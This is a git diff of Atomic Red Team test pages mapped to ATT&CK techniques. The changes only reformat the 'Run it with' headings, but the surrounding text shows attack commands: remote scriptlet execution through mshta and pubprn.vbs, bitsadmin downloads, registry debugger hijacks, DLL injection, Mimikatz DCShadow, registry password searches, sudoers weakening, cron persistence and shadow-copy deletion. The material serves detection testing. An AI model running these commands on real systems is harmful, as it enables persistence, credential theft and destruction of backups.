-path . -stream #{ads_filename} -value "test3" diff --git a/atomics/T1159/T1159.md b/atomics/T1159/T1159.md index fbdfa811..c6719a73 100644 --- a/atomics/T1159/T1159.md +++ b/atomics/T1159/T1159.md @@ -17,8 +17,7 @@ Create a plist and execute it **Supported Platforms:** macOS -#### Run it with these steps! -1. Create file - .client +#### Run it with these steps! 1. Create file - .client 2. osascript -e 'tell app "Finder" to display dialog "Hello World"' diff --git a/atomics/T1160/T1160.md b/atomics/T1160/T1160.md index 6c5f7fb5..b68acc20 100644 --- a/atomics/T1160/T1160.md +++ b/atomics/T1160/T1160.md @@ -19,8 +19,7 @@ Utilize LaunchDaemon to launch `Hello World` **Supported Platforms:** macOS -#### Run it with these steps! -1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons +#### Run it with these steps! 1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons 2. diff --git a/atomics/T1163/T1163.md b/atomics/T1163/T1163.md index fa796830..576f6f10 100644 --- a/atomics/T1163/T1163.md +++ b/atomics/T1163/T1163.md @@ -19,8 +19,7 @@ Modify rc.common **Supported Platforms:** macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common ```
diff --git a/atomics/T1164/T1164.md b/atomics/T1164/T1164.md index 60fc1e91..9b572276 100644 --- a/atomics/T1164/T1164.md +++ b/atomics/T1164/T1164.md @@ -21,8 +21,7 @@ Plist Method **Supported Platforms:** macOS -#### Run it with these steps! -1. create a custom plist: +#### Run it with these steps! 1. create a custom plist: ~/Library/Preferences/com.apple.loginwindow.plist @@ -47,8 +46,7 @@ Mac Defaults |------|-------------|------|---------------| | script | path to script | path | /path/to/script| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo defaults write com.apple.loginwindow LoginHook #{script} sudo defaults delete com.apple.loginwindow LoginHook ``` diff --git a/atomics/T1165/T1165.md b/atomics/T1165/T1165.md index 2d5f7e50..bd9b8467 100644 --- a/atomics/T1165/T1165.md +++ b/atomics/T1165/T1165.md @@ -21,8 +21,7 @@ Modify or create an file in StartupItems **Supported Platforms:** macOS -#### Run it with these steps! -1. /Library/StartupItems/StartupParameters.plist +#### Run it with these steps! 1. /Library/StartupItems/StartupParameters.plist
@@ -39,8 +38,7 @@ Establish persistence via a rule run by emond daemon at startup, based on https: |------|-------------|------|---------------| | plist | Path to emond plist file | path | /path/to/T1165_emond.plist| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo cp "#{plist}" /etc/emond.d/rules/T1165_emond.plist sudo touch /private/var/db/emondClients/T1165 #Clean up diff --git a/atomics/T1166/T1166.md b/atomics/T1166/T1166.md index 6048cc50..2837d6fe 100644 --- a/atomics/T1166/T1166.md +++ b/atomics/T1166/T1166.md @@ -26,8 +26,7 @@ Setuid and Setgid |------|-------------|------|---------------| | payload | hello.c payload | path | hello.c| -#### Run it with these steps! -1. make hello +#### Run it with these steps! 1. make hello 2. sudo chown root hello @@ -50,8 +49,7 @@ This test sets the SetUID flag on a file in Linux and macOS. |------|-------------|------|---------------| | file_to_setuid | Path of file to set SetUID flag | path | /tmp/evilBinary| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo chown root #{file_to_setuid} sudo chmod u+s #{file_to_setuid} ``` @@ -69,8 +67,7 @@ This test sets the SetGID flag on a file in Linux and macOS. |------|-------------|------|---------------| | file_to_setuid | Path of file to set SetGID flag | path | /tmp/evilBinary| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo chown root #{file_to_setuid} sudo chmod g+s #{file_to_setuid} ``` diff --git a/atomics/T1168/T1168.md b/atomics/T1168/T1168.md index 0010420e..8ce66670 100644 --- a/atomics/T1168/T1168.md +++ b/atomics/T1168/T1168.md @@ -39,8 +39,7 @@ This test replaces the current user's crontab file with the contents of the refe | command | Command to execute | string | /tmp/evil.sh| | tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} ```
@@ -58,8 +57,7 @@ This test adds a script to a cron folder configured to execute on a schedule. Th | command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log| | cron_script_name | Name of file to store in cron folder | string | persistevil| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` echo "#{command}" > /etc/cron.daily/#{cron_script_name} ```
@@ -71,8 +69,7 @@ This test adds persistence via a plist to execute via the macOS Event Monitor Da **Supported Platforms:** macOS, CentOS, Ubuntu, Linux -#### Run it with these steps! -1. Place this file in /etc/emond.d/rules/atomicredteam.plist +#### Run it with these steps! 1. Place this file in /etc/emond.d/rules/atomicredteam.plist diff --git a/atomics/T1169/T1169.md b/atomics/T1169/T1169.md index 7cd300a2..4cada5f5 100644 --- a/atomics/T1169/T1169.md +++ b/atomics/T1169/T1169.md @@ -17,8 +17,7 @@ Common Sudo enumeration methods. **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo -l sudo su cat /etc/sudoers diff --git a/atomics/T1170/T1170.md b/atomics/T1170/T1170.md index c5a7cedf..be3c4d5a 100644 --- a/atomics/T1170/T1170.md +++ b/atomics/T1170/T1170.md @@ -28,8 +28,7 @@ Test execution of a remote script using mshta.exe |------|-------------|------|---------------| | file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close(); ```
diff --git a/atomics/T1173/T1173.md b/atomics/T1173/T1173.md index f5d4a7f9..3b19fafd 100644 --- a/atomics/T1173/T1173.md +++ b/atomics/T1173/T1173.md @@ -19,8 +19,7 @@ Executes commands via DDE using Microsfot Word **Supported Platforms:** Windows -#### Run it with these steps! -Open Microsoft Word +#### Run it with these steps! Open Microsoft Word Insert tab -> Quick Parts -> Field diff --git a/atomics/T1174/T1174.md b/atomics/T1174/T1174.md index 5f8be027..496da46b 100644 --- a/atomics/T1174/T1174.md +++ b/atomics/T1174/T1174.md @@ -24,8 +24,7 @@ Uses PowerShell to install and register a password filter DLL. Requires a reboot |------|-------------|------|---------------| | input_dll | Path to DLL to be installed and registered | Path | C:\AtomicRedTeam\atomics\T1174\src\AtomicPasswordFilter.dll| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" $notificationPackagesValues = $lsaKey.GetValue("Notification Packages") diff --git a/atomics/T1176/T1176.md b/atomics/T1176/T1176.md index 5ee85808..23df705a 100644 --- a/atomics/T1176/T1176.md +++ b/atomics/T1176/T1176.md @@ -21,8 +21,7 @@ xxx **Supported Platforms:** Linux, Windows, macOS -#### Run it with these steps! -1. Navigate to [chrome://extensions](chrome://extensions) and +#### Run it with these steps! 1. Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. 2. Click 'Load unpacked extension...' and navigate to @@ -40,8 +39,7 @@ xxx **Supported Platforms:** Linux, Windows, macOS -#### Run it with these steps! -1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend +#### Run it with these steps! 1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome 2. Click 'Add to Chrome' @@ -56,8 +54,7 @@ Create a file called test.wma, with the duration of 30 seconds **Supported Platforms:** Linux, Windows, macOS -#### Run it with these steps! -1. Navigate to [about:debugging](about:debugging) and +#### Run it with these steps! 1. Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" 2. Navigate to [manifest.json](./manifest.json) diff --git a/atomics/T1179/T1179.md b/atomics/T1179/T1179.md index 58c442f1..9af31381 100644 --- a/atomics/T1179/T1179.md +++ b/atomics/T1179/T1179.md @@ -33,8 +33,7 @@ Hooks functions in PowerShell to read TLS Communications | file_name | Dll To Inject | Path | C:\AtomicRedTeam\atomics\T1179\bin\T1179x64.dll| | server_name | TLS Server To Test Get Request | Url | https://www.example.com| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` mavinject $pid /INJECTRUNNING #{file_name} curl #{server_name} ``` diff --git a/atomics/T1180/T1180.md b/atomics/T1180/T1180.md index 97eafb50..62ac20dc 100644 --- a/atomics/T1180/T1180.md +++ b/atomics/T1180/T1180.md @@ -29,8 +29,7 @@ This test copies a binary into the Windows System32 folder and sets it as the sc |------|-------------|------|---------------| | input_binary | Executable binary to use in place of screensaver for persistence | path | C:\Windows\System32\cmd.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr" reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverTimeout /t REG_SZ /d 60 /f diff --git a/atomics/T1183/T1183.md b/atomics/T1183/T1183.md index 145d6399..f600b8ac 100644 --- a/atomics/T1183/T1183.md +++ b/atomics/T1183/T1183.md @@ -37,8 +37,7 @@ Leverage Global Flags Settings | target_binary | Binary To Attach To | Path | winword.exe| | payload_binary | Binary To Execute | Path | cmd.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" ```
@@ -56,8 +55,7 @@ Leverage Global Flags Settings | target_binary | Binary To Attach To | Path | notepad.exe| | payload_binary | Binary To Execute | Path | cmd.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}" ```
diff --git a/atomics/T1191/T1191.md b/atomics/T1191/T1191.md index fa2ee84e..cd9fe067 100644 --- a/atomics/T1191/T1191.md +++ b/atomics/T1191/T1191.md @@ -26,8 +26,7 @@ Adversaries may supply CMSTP.exe with INF files infected with malicious commands |------|-------------|------|---------------| | inf_file_path | Path to the INF file | path | T1191.inf| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` cmstp.exe /s #{inf_file_path} ```
@@ -44,8 +43,7 @@ Adversaries may invoke cmd.exe (or other malicious commands) by embedding them i |------|-------------|------|---------------| | inf_file_uac | Path to the INF file | path | T1191_uacbypass.inf| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` cmstp.exe /s #{inf_file_uac} /au ```
diff --git a/atomics/T1193/T1193.md b/atomics/T1193/T1193.md index bd02af64..18e416ac 100644 --- a/atomics/T1193/T1193.md +++ b/atomics/T1193/T1193.md @@ -18,8 +18,7 @@ The below will successfully download the macro-enabled Excel file to the current **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` if (-not(Test-Path HKLM:SOFTWARE\Classes\Excel.Application)){ return 'Please install Microsoft Excel before running this test.' } diff --git a/atomics/T1196/T1196.md b/atomics/T1196/T1196.md index c458b43c..667d9690 100644 --- a/atomics/T1196/T1196.md +++ b/atomics/T1196/T1196.md @@ -24,8 +24,7 @@ This test simulates an adversary leveraging control.exe to execute a payload and |------|-------------|------|---------------| | cpl_file_path | path to cpl file | path | calc.cpl| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` control.exe #{cpl_file_path} ```
diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md index a5281693..18d29e36 100644 --- a/atomics/T1197/T1197.md +++ b/atomics/T1197/T1197.md @@ -32,8 +32,7 @@ and execute a payload | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md| | local_file | Local file path to save downloaded file | path | C:\Windows\Temp\bitsadmin_flag.ps1| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} ```
@@ -52,8 +51,7 @@ and execute a payload leveraging PowerShell | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md| | local_file | Local file path to save downloaded file | path | C:\Windows\Temp\bitsadmin_flag.ps1| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} ```
@@ -75,8 +73,7 @@ and execute a payload in multiple steps. This job will remain in the BITS queue | command_path | Path of command to execute | path | C:\Windows\system32\notepad.exe| | command_line | Command line to execute | string | C:\Windows\Temp\bitsadmin_flag.ps1| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` bitsadmin.exe /create #{bits_job_name} bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line} diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md index 1191b36d..43bddab0 100644 --- a/atomics/T1201/T1201.md +++ b/atomics/T1201/T1201.md @@ -40,8 +40,7 @@ Lists the password complexity policy to console on Ubuntu Linux. **Supported Platforms:** Ubuntu -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` cat /etc/pam.d/common-password ```
@@ -53,8 +52,7 @@ Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. **Supported Platforms:** CentOS -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` cat /etc/security/pwquality.conf ```
@@ -66,8 +64,7 @@ Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. **Supported Platforms:** CentOS -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` cat /etc/pam.d/system-auth cat /etc/security/pwquality.conf @@ -81,8 +78,7 @@ Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. **Supported Platforms:** Linux -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` cat /etc/login.defs ```
@@ -94,8 +90,7 @@ Lists the local password policy to console on Windows. **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` net accounts ```
@@ -107,8 +102,7 @@ Lists the domain password policy to console on Windows. **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` net accounts /domain ```
@@ -120,8 +114,7 @@ Lists the password policy to console on Windows. **Supported Platforms:** macOS -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` pwpolicy getaccountpolicies ```
diff --git a/atomics/T1202/T1202.md b/atomics/T1202/T1202.md index 1085d8e6..c4d2b7a8 100644 --- a/atomics/T1202/T1202.md +++ b/atomics/T1202/T1202.md @@ -28,8 +28,7 @@ The Program Compatibility Assistant (pcalua.exe) may invoke the execution of pro | payload_path | Path to payload | path | c:\temp\payload.dll| | payload_cpl_path | Path to payload | path | C:\Windows\system32\javacpl.cpl -c Java| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` pcalua.exe -a #{process} pcalua.exe -a #{payload_path} pcalua.exe -a #{payload_cpl_path} @@ -52,8 +51,7 @@ forfiles.exe may invoke the execution of programs and commands from a Command-Li |------|-------------|------|---------------| | process | Process to execute | string | calc.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` forfiles /p c:\windows\system32 /m notepad.exe /c #{process} forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" ``` diff --git a/atomics/T1206/T1206.md b/atomics/T1206/T1206.md index 7f78c607..c5958ccc 100644 --- a/atomics/T1206/T1206.md +++ b/atomics/T1206/T1206.md @@ -21,8 +21,7 @@ Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers sudo visudo -c -f /etc/sudoers ``` @@ -35,8 +34,7 @@ Sets sudo caching tty_tickets value to disabled. This is dangerous to modify wit **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers" sudo visudo -c -f /etc/sudoers ``` diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md index 574248f2..ceb41dd0 100644 --- a/atomics/T1207/T1207.md +++ b/atomics/T1207/T1207.md @@ -22,8 +22,7 @@ Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller **Supported Platforms:** Windows -#### Run it with these steps! -1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM. +#### Run it with these steps! 1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM. 2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes. 3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480 4. lsadump::dcshadow /push diff --git a/atomics/T1214/T1214.md b/atomics/T1214/T1214.md index 5079e632..8d7b7be2 100644 --- a/atomics/T1214/T1214.md +++ b/atomics/T1214/T1214.md @@ -20,8 +20,7 @@ Queries to enumerate for credentials in the Registry. **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s ``` diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md index 77f15e5d..ac85be65 100644 --- a/atomics/T1216/T1216.md +++ b/atomics/T1216/T1216.md @@ -24,8 +24,7 @@ Executes the signed PubPrn.vbs script with options to download and execute an ar |------|-------------|------|---------------| | remote_payload | A remote payload to execute using PubPrn.vbs. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" ```
diff --git a/atomics/T1217/T1217.md b/atomics/T1217/T1217.md index 32c8e9aa..afe25fa0 100644 --- a/atomics/T1217/T1217.md +++ b/atomics/T1217/T1217.md @@ -21,8 +21,7 @@ Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that **Supported Platforms:** Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \; ```
@@ -34,8 +33,7 @@ Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookm **Supported Platforms:** macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \; ```
diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index 8b146ee9..4a0369df 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -48,8 +48,7 @@ Injects arbitrary DLL into running process specified by process ID. Requires Win | dll_payload | DLL to inject | Path | C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll| | process_id | PID of process receiving injection | string | 1000| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} ```
@@ -66,8 +65,7 @@ Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires |------|-------------|------|---------------| | powershell_code | PowerShell code to execute | string | Start-Process calc.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` SyncAppvPublishingServer.exe "n; #{powershell_code}" ```
@@ -84,8 +82,7 @@ Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can |------|-------------|------|---------------| | dll_payload | DLL to execute | Path | C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} ```
diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md index dcc29282..49f7e327 100644 --- a/atomics/T1220/T1220.md +++ b/atomics/T1220/T1220.md @@ -40,8 +40,7 @@ Executes the code specified within a XSL script tag during XSL transformation us | xmlfile | Location of the test XML file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml| | xslfile | Location of the test XSL script file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} ```
@@ -59,8 +58,7 @@ Executes the code specified within a XSL script tag during XSL transformation us | xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml| | xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} ```
@@ -78,8 +76,7 @@ Executes the code specified within a XSL script using a local payload. | wmic_command | WMI command to execute using wmic.exe | string | process list| | local_xsl_file | Location of the test XSL script file on the local filesystem. | path | C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file} ```
@@ -97,8 +94,7 @@ Executes the code specified within a XSL script using a remote payload. | wmic_command | WMI command to execute using wmic.exe | string | process list| | remote_xsl_file | Remote location of an XSL payload. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file} ```
diff --git a/atomics/T1222/T1222.md b/atomics/T1222/T1222.md index 6f3882ac..168626f9 100644 --- a/atomics/T1222/T1222.md +++ b/atomics/T1222/T1222.md @@ -52,8 +52,7 @@ Modifies the filesystem permissions of the specified file or folder to take owne |------|-------------|------|---------------| | file_folder_to_own | Path of the file or folder for takeown to take ownership. | path | C:\AtomicRedTeam\atomics\T1222\T1222.yaml| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` takeown.exe /f #{file_folder_to_own} ```
@@ -70,8 +69,7 @@ Modifies the filesystem permissions of the specified folder to take ownership of |------|-------------|------|---------------| | folder_to_own | Path of the folder for takeown to take ownership. | path | C:\AtomicRedTeam\atomics\T1222| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` takeown.exe /f #{folder_to_own} /r ```
@@ -89,8 +87,7 @@ Modifies the filesystem permissions of the specified file or folder to allow the | file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222\T1222.yaml| | user_or_group | User or group to allow full control | string | Everyone| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` cacls.exe #{file_or_folder} /grant #{user_or_group}:F ```
@@ -108,8 +105,7 @@ Modifies the filesystem permissions of the specified folder and contents to allo | file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222| | user_or_group | User or group to allow full control | string | Everyone| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` cacls.exe #{file_or_folder} /grant #{user_or_group}:F /t ```
@@ -127,8 +123,7 @@ Modifies the filesystem permissions of the specified file or folder to allow the | file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222\T1222.yaml| | user_or_group | User or group to allow full control | string | Everyone| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` icacls.exe #{file_or_folder} /grant #{user_or_group}:F ```
@@ -146,8 +141,7 @@ Modifies the filesystem permissions of the specified folder and contents to allo | file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222| | user_or_group | User or group to allow full control | string | Everyone| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` icacls.exe #{file_or_folder} /grant #{user_or_group}:F /t ```
@@ -164,8 +158,7 @@ Removes the read-only attribute from a file or folder using the attrib.exe comma |------|-------------|------|---------------| | file_or_folder | Path of the file or folder remove attribute. | path | C:\AtomicRedTeam\atomics\T1222| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` attrib.exe -r #{file_or_folder} ```
@@ -183,8 +176,7 @@ Changes a file or folder's permissions using chmod and a specified numeric mode. | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222| | numeric_mode | Specified numeric mode value | string | 755| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` chmod #{numeric_mode} #{file_or_folder} ```
@@ -202,8 +194,7 @@ Changes a file or folder's permissions using chmod and a specified symbolic mode | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222| | symbolic_mode | Specified symbolic mode value | string | a+w| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` chmod #{symbolic_mode} #{file_or_folder} ```
@@ -221,8 +212,7 @@ Changes a file or folder's permissions recursively using chmod and a specified n | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222| | numeric_mode | Specified numeric mode value | string | 755| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` chmod #{numeric_mode} #{file_or_folder} -R ```
@@ -240,8 +230,7 @@ Changes a file or folder's permissions recursively using chmod and a specified s | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222| | symbolic_mode | Specified symbolic mode value | string | a+w| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` chmod #{symbolic_mode} #{file_or_folder} -R ```
@@ -260,8 +249,7 @@ Changes a file or folder's ownership and group information using chown. | owner | Username of desired owner | string | root| | group | Group name of desired group | string | root| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` chown #{owner}:#{group} #{file_or_folder} ```
@@ -280,8 +268,7 @@ Changes a file or folder's ownership and group information recursively using cho | owner | Username of desired owner | string | root| | group | Group name of desired group | string | root| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` chown #{owner}:#{group} #{file_or_folder} -R ```
@@ -299,8 +286,7 @@ Changes a file or folder's ownership only using chown. | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222/T1222.yaml| | owner | Username of desired owner | string | root| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` chown #{owner} #{file_or_folder} ```
@@ -318,8 +304,7 @@ Changes a file or folder's ownership only recursively using chown. | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222| | owner | Username of desired owner | string | root| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` chown #{owner} #{file_or_folder} -R ```
@@ -337,8 +322,7 @@ This technique was used by the threat actor Rocke during the compromise of Linux |------|-------------|------|---------------| | file_to_modify | Path of the file | path | /var/spool/cron/root| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` chattr -i #{file_to_modify} ```
diff --git a/atomics/T1223/T1223.md b/atomics/T1223/T1223.md index f1a6d3db..b3158791 100644 --- a/atomics/T1223/T1223.md +++ b/atomics/T1223/T1223.md @@ -24,8 +24,7 @@ Uses hh.exe to execute a local compiled HTML Help payload. |------|-------------|------|---------------| | local_chm_file | Local .chm payload | path | C:\atomic-red-team\atomics\T1223\src\T1223.chm| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` hh.exe #{local_chm_file} ```
@@ -42,8 +41,7 @@ Uses hh.exe to execute a remote compiled HTML Help payload. |------|-------------|------|---------------| | remote_chm_file | Remote .chm payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1223/src/T1223.chm| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` hh.exe #{remote_chm_file} ```
diff --git a/atomics/T1482/T1482.md b/atomics/T1482/T1482.md index 170c7bc3..1728911a 100644 --- a/atomics/T1482/T1482.md +++ b/atomics/T1482/T1482.md @@ -18,8 +18,7 @@ Requires the installation of dsquery via Windows RSAT or the Windows Server AD D **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` dsquery * -filter "(objectClass=trustedDomain)" -attr * ```
@@ -33,8 +32,7 @@ This technique has been used by the Trickbot malware family. **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` nltest /domain_trusts ```
diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index b58bf90b..1ad587e8 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md @@ -27,8 +27,7 @@ Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomw **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` vssadmin.exe delete shadows /all /quiet ```
